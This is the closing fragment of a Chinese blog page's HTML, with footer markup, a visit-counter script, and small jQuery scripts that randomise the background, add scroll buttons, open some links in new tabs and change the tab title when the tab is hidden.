                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>